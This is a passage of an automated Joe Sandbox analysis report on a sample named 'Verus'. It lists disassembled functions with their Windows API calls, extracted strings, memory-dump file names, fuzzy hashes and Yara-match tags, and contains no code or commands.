_wcsncpy.LIBCMT ref: 004789D4
_wcsncpy.LIBCMT ref: 00478A3F

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _wcsncpy$_malloc_memset
String ID:
API String ID: 1194830507-0
Opcode ID: 42eef021bdc544c273be6f2bd70279109e3d55ea2e756c83475de027fd7c23e3
Instruction ID: 595f50ef59767d3e1270d6c6ad8b8f413e222c1824bac761bc1a0fc58d8aac05
Opcode Fuzzy Hash: 42eef021bdc544c273be6f2bd70279109e3d55ea2e756c83475de027fd7c23e3
Instruction Fuzzy Hash: 45A1F7B16047019FD724EF28D84596BB7E6EF84314F10892EF59A87381DB38ED05CB66

Function 004BD1D0 Relevance: 4.6, APIs: 3, Instructions: 118stringfileCOMMONLIBRARYCODE

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,AD5E0258,?,?,?,?,?,?,?,?,-&D,AD5E0258,?,?), ref: 004BD2B1

Part of subcall function 00402D00: std::_Cnd_initX.LIBCPMTD ref: 00402D3E

lstrcmpW.KERNEL32(?,004DD244,?,?,?,?,?,?,?,?,-&D,AD5E0258,?,?), ref: 004BD307
lstrcmpW.KERNEL32(?,004DE5F0,?,?,?,?,?,?,?,?,-&D,AD5E0258,?,?), ref: 004BD31D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcmp$Cnd_initFileFindFirststd::_
String ID:
API String ID: 145199813-0
Opcode ID: f982df5d4e9b7cd145515ea051a4078024855a5d8a6bc7833e9ed9efed6e5331
Instruction ID: 79de6853fbdf1033746b503589e2557ec660037feaebf273e51a79499a9740cf
Opcode Fuzzy Hash: f982df5d4e9b7cd145515ea051a4078024855a5d8a6bc7833e9ed9efed6e5331
Instruction Fuzzy Hash: 72413A74910218DFCB08EF95D895AEEB7B5BF44708F50416AE812A73D1EB34A901CB58

Function 00424350 Relevance: 4.6, APIs: 3, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00424200: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00424236
Part of subcall function 00424200: FlushInstructionCache.KERNEL32(00000000), ref: 0042423D
Part of subcall function 00424200: CreateDialogParamW.USER32(?,000000D2,000000E9,Function_000166E0,?), ref: 0042426D

ShowWindow.USER32(?,00000005,?,AD5E0258), ref: 004243B8

Part of subcall function 00474430: SetDlgItemTextW.USER32(?,000003FD,00000000), ref: 0047443E

GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,00000000), ref: 00424418
DestroyWindow.USER32(?), ref: 0042443B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$CacheCreateCurrentDestroyDialogDiskFlushFreeInstructionItemParamProcessShowSpaceText
String ID:
API String ID: 3515573207-0
Opcode ID: a26701c9c77ba5085399f0d54afd205249f9aca47e9cd785bb9307b05230a428
Instruction ID: dd102b97063a4d39055caddfb13145861e12c05ba83f36c8b377398ada6e2571
Opcode Fuzzy Hash: a26701c9c77ba5085399f0d54afd205249f9aca47e9cd785bb9307b05230a428
Instruction Fuzzy Hash: EC315BB55183409FC314DF65D841A5BBBE8FFC8B14F004A2EF59993290EB34D908CB5A

Function 00B75080 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

Yber, xrefs: 00B75264
NPFN, xrefs: 00B751BC
w, xrefs: 00B7552F

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: NPFN$Yber$w
API String ID: 0-2009834778
Opcode ID: 46400cebba84cf08faf9a0302c8c6e187f2ff96aff06ec11dfca6f1037fb6710
Instruction ID: 455f2b2aa47c5a91d7b5d5fb5f9ab15b81a2f7a4469edc116c6684495926cdb4
Opcode Fuzzy Hash: 46400cebba84cf08faf9a0302c8c6e187f2ff96aff06ec11dfca6f1037fb6710
Instruction Fuzzy Hash: 8CE1F4716093406BE720DF24DD81BAFBBE8DBD5314F08C8ADF89997242D674D9098793

Function 00B5F430 Relevance: 4.1, Strings: 3, Instructions: 358COMMON

Download Yara Rule

Strings

D, xrefs: 00B5F60B
pq, xrefs: 00B5F8A9
T, xrefs: 00B5F4A2

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: D$T$pq
API String ID: 0-1650208392
Opcode ID: 179ced83c93506f93868ebb32039e1a034d70eca660c4b6b59c32d5282ddd536
Instruction ID: 309881ca28368f2322c767693566fc9de3e12c3d64df4c41f20e815afed009d6
Opcode Fuzzy Hash: 179ced83c93506f93868ebb32039e1a034d70eca660c4b6b59c32d5282ddd536
Instruction Fuzzy Hash: 74C1DDB16083819FE710DF25D88176BBBE2EBC1314F18886CE5D45B356DA75C90ACB93

Function 00B5F040 Relevance: 4.1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

Strings

'|H, xrefs: 00B5F1F9
., xrefs: 00B5F1DE
+ 47, xrefs: 00B5F364

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: + 47$.$'|H
API String ID: 0-109567950
Opcode ID: 54ebea9f41e9dbb84324b087273c464a07e3396ba849ab18214a3e9178a1a45c
Instruction ID: 71c650dc1b9301b871c997dabd65ead704fdf5792a2e46e4461cbc855ce57fc7
Opcode Fuzzy Hash: 54ebea9f41e9dbb84324b087273c464a07e3396ba849ab18214a3e9178a1a45c
Instruction Fuzzy Hash: 33A1E17151C3918FD7158F29885036BFFE1EB96314F1889ACE8D59B382C779890ACB92

Function 00B7F0A0 Relevance: 2.7, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

['e!, xrefs: 00B7F0F5
U123, xrefs: 00B7F1CB, 00B7F1CF

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: U123$['e!
API String ID: 0-1796562098
Opcode ID: fb9722cd765a8f1f667f1c5091e886384392bc66525bf14e4da9e340b7674b2c
Instruction ID: f08b381783a0e2a341746313608d9dc96f834089327ea7b0e1911a2d5dd9041e
Opcode Fuzzy Hash: fb9722cd765a8f1f667f1c5091e886384392bc66525bf14e4da9e340b7674b2c
Instruction Fuzzy Hash: 8C81ABB160C3958FD714CF28D89076FBBE0EBC5714F14892DE5E99B281D7B489498B83

Function 00B5B566 Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

8, xrefs: 00B5B5BC
0, xrefs: 00B5B5C4

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 0efc1294e32fe2dc1f15a8140f78967acb3ef10ebe1a0021df57d37c3e985f00
Instruction ID: cfee51c842e7c07e8608ab13ec6e7a8fe451ae7645531bc34d702f8dcfa3761f
Opcode Fuzzy Hash: 0efc1294e32fe2dc1f15a8140f78967acb3ef10ebe1a0021df57d37c3e985f00
Instruction Fuzzy Hash: 8231153660D3C48FD315CA28C480A9FBFE2AFE6254F08498CE8C497352C674D949CB93

Function 00490B59 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00490C47,?,?,00415874,?), ref: 00490B6D
HeapFree.KERNEL32(00000000,?,00490C47,?,?,00415874,?), ref: 00490B74

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 76d601aff158622615767b1d641ba1e1b0825fc12b9fc0254540adfb1494b4b7
Instruction ID: 9f8773b301678c71cb477ba2a73c8e5a65ac4ecf7adb21ee46946cb417c83d6f
Opcode Fuzzy Hash: 76d601aff158622615767b1d641ba1e1b0825fc12b9fc0254540adfb1494b4b7
Instruction Fuzzy Hash: FAD0C936844208ABDF402BE4FD0DE9B3F6DF7E871AF054411F24DC2621DB36E891AA65

Function 004BC690 Relevance: 1.6, APIs: 1, Instructions: 128timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 004BC881

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: a1c30983c587b63ca3b26b8f99627fa6aa00b2d1ddaa7b96e7242652b03fcfbe
Instruction ID: 80f47634c6f7caf8dd30167d3e4c170351b8c0a7a6660143da192a8c7d36fcba
Opcode Fuzzy Hash: a1c30983c587b63ca3b26b8f99627fa6aa00b2d1ddaa7b96e7242652b03fcfbe
Instruction Fuzzy Hash: 7F612734904299DFDB14CF18C884BE8BBB2BF55314F1481DAE8496B382C7799AC4DF65

Function 00B7D070 Relevance: 1.6, Strings: 1, Instructions: 352COMMON

Download Yara Rule

Strings

%*+(, xrefs: 00B7D134

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: b29c564438925c3d96467325200ae336ebd7521098b972593b0ffd4d5b9ce038
Instruction ID: 9eb59fa19cd67931454f5ec456dacb3be432386c7199cd4d3608b657368cc4f1
Opcode Fuzzy Hash: b29c564438925c3d96467325200ae336ebd7521098b972593b0ffd4d5b9ce038
Instruction Fuzzy Hash: 13A126716083018BD7109F24C88072BB7F2EF95794F14C9ACE9A9AB382E735DD46C796

Function 0043F0B0 Relevance: 1.5, APIs: 1, Instructions: 34comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004D5710,00000000,00000001,004C8D58,?), ref: 0043F0DC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: ba7edde8ad8982716cfd9d0867f3cdc4f54264b52accdac5d36ec4b5d047b9d2
Instruction ID: 86d0bde18b85574deb4b0c861691437f7a80d56b0df488cabd80096e691e9652
Opcode Fuzzy Hash: ba7edde8ad8982716cfd9d0867f3cdc4f54264b52accdac5d36ec4b5d047b9d2
Instruction Fuzzy Hash: 93F05E76300610ABC7219A0E9884E43B7E5AFED721B20843EE64897301D6369846C6A8

Function 00B684F2 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

\fs>, xrefs: 00B68829

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: \fs>
API String ID: 0-699854602
Opcode ID: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
Instruction ID: 6ba175b31f37f785357924f82170b7fdde01d35d61d8af6228f91db199db44b3
Opcode Fuzzy Hash: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
Instruction Fuzzy Hash: 10B1D775515B808FC3228B38C4993E7BFE5AB56314F588DADC8EB87386DA38A505C712

Function 00B62418 Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

[vSO, xrefs: 00B6241E

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: [vSO
API String ID: 0-448860619
Opcode ID: e407b34540df400001dc5778b816732a2f9fc3c95ec119a49a36422e6199eb32
Instruction ID: 5502fc275d410e11b81581b741b8fd9ce7e832fe9ff15ac3c708498acf514ec9
Opcode Fuzzy Hash: e407b34540df400001dc5778b816732a2f9fc3c95ec119a49a36422e6199eb32
Instruction Fuzzy Hash: E0B01238D4D18097D6888F6CA9B3170A7B8465710CB1C70BC894FE7243C402D053890D

Function 00B59440 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5091201c6dfffc21702104fa9ec1ddf0b426af3d626309bf305ab24849ce2dcd
Instruction ID: 887e48148a2d37dface308d89fc91e742d2f40f265f9c89278412eae35aae95f
Opcode Fuzzy Hash: 5091201c6dfffc21702104fa9ec1ddf0b426af3d626309bf305ab24849ce2dcd
Instruction Fuzzy Hash: BE320370514B11CFC368CF29C5D062ABBF1FB85711B604AAEDAA787B90D736B849CB14

Function 00B50001 Relevance: .5, Instructions: 534COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07edb631a378585d02b43a841f61f4df4eb41c358c50fbb56abae5bf56e4856
Instruction ID: b3cb5577cf8614c5e1b92d82b7194a98e4148365bbc0a429eef6d92ad4df7502
Opcode Fuzzy Hash: a07edb631a378585d02b43a841f61f4df4eb41c358c50fbb56abae5bf56e4856
Instruction Fuzzy Hash: 6B22EE769003258FDB08CFB9EC9525A7FB2F7A0304F42922DD442BB365CB34194AAF81

Function 00B552E0 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eabd45851e16f04472cf07433418b6fc246a9985c6938a8d25654b45ddbe58ba
Instruction ID: 91215d7f2a7fed1e08587b80208389bc5e131fde1c3dba006ff28a9d77338658
Opcode Fuzzy Hash: eabd45851e16f04472cf07433418b6fc246a9985c6938a8d25654b45ddbe58ba
Instruction Fuzzy Hash: 7CD1D471A187019BC714CF28C89071EB7E5EFC8752F258EADF89997390E671DC098B86

Function 00B67007 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13058ab9ec458894512ad163bd69db8567fad7f17717dc5b3766591bad069869
Instruction ID: 2a6d5f1cff62b747b45f28b6fb189755f30d641dffd99ba7467f51f5fb62ee82
Opcode Fuzzy Hash: 13058ab9ec458894512ad163bd69db8567fad7f17717dc5b3766591bad069869
Instruction Fuzzy Hash: C3E1A3B5608B808FD7259B38C4953ABBBE1AF55314F084D6DD8EFC7382E639A504CB12

Function 00B963E0 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b06e7e87900422d5a672858d10153d9fb72d57ed0e6dc758a445c338d4020702
Instruction ID: b2b7010a395ee83f30b2bda55d7f5e779677fbf145e1128e02650f11c8fb1475
Opcode Fuzzy Hash: b06e7e87900422d5a672858d10153d9fb72d57ed0e6dc758a445c338d4020702
Instruction Fuzzy Hash: AEB10572A083104BEB149F69DC81B6BB7E9EBC0314F0989BDFD5587391E674DD048792

Function 0048F030 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64b84b10ff1fefbb76e78316521b042cc5ff1e41715890dedc088ec1ff6f9595
Instruction ID: 3d129f08e2652982e25d1801db0785c512bba4c1d148c34cbb9b365e8c12e496
Opcode Fuzzy Hash: 64b84b10ff1fefbb76e78316521b042cc5ff1e41715890dedc088ec1ff6f9595
Instruction Fuzzy Hash: 3ED13675D11189EFDB48EF88D890AADBBB2FF88311F1481AED102A7355C734AB91DB44

Function 00476C50 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73d23722997b169188e80bd7c1ad562e6ad00d01f15415119943454ebdede95e
Instruction ID: b600b8c9aa43431858e6329e8759fb3206c25aed7bcd9e74df6c6efcd2316ed3
Opcode Fuzzy Hash: 73d23722997b169188e80bd7c1ad562e6ad00d01f15415119943454ebdede95e
Instruction Fuzzy Hash: 577108753007014FD71CDF2CCC91AEABB93AB85314F05893EE9978B392EA35A805C769

Function 00B8D4E0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d23429eb03083d8ad6b52875692930ce62021611f4812b27f6aac4f420f026
Instruction ID: 339f9af2f759ad17a12661391b2230e550d43673cc81ff8e4e91f193c25032cf
Opcode Fuzzy Hash: c8d23429eb03083d8ad6b52875692930ce62021611f4812b27f6aac4f420f026
Instruction Fuzzy Hash: A2516DB15087548FE314EF29D49475BBBE1FBC4318F544A2EE4E987391E379DA088B82

Function 00B57260 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc40b57b97b598223936059aba22e579accfd6104ef8575315bc923e038ec1fe
Instruction ID: 6855c83594c33a78e4ddf9ed590ee9ed84e4b3ec9cacd55bbd04defcf1a83a5d
Opcode Fuzzy Hash: bc40b57b97b598223936059aba22e579accfd6104ef8575315bc923e038ec1fe
Instruction Fuzzy Hash: 7E519F75A082009FC714DF18D480A2AB7E5FF89325F1546ECEC998B352DA31EC46CB96

Function 0048EE30 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12ebdd81c007cb9ff1b1bb94eb63845595618e77b8abd726e4808794dfe99279
Instruction ID: 4fd97fe4121023057839f0adb19459ae407975dde91cb28fbd7bbccb0740f221
Opcode Fuzzy Hash: 12ebdd81c007cb9ff1b1bb94eb63845595618e77b8abd726e4808794dfe99279
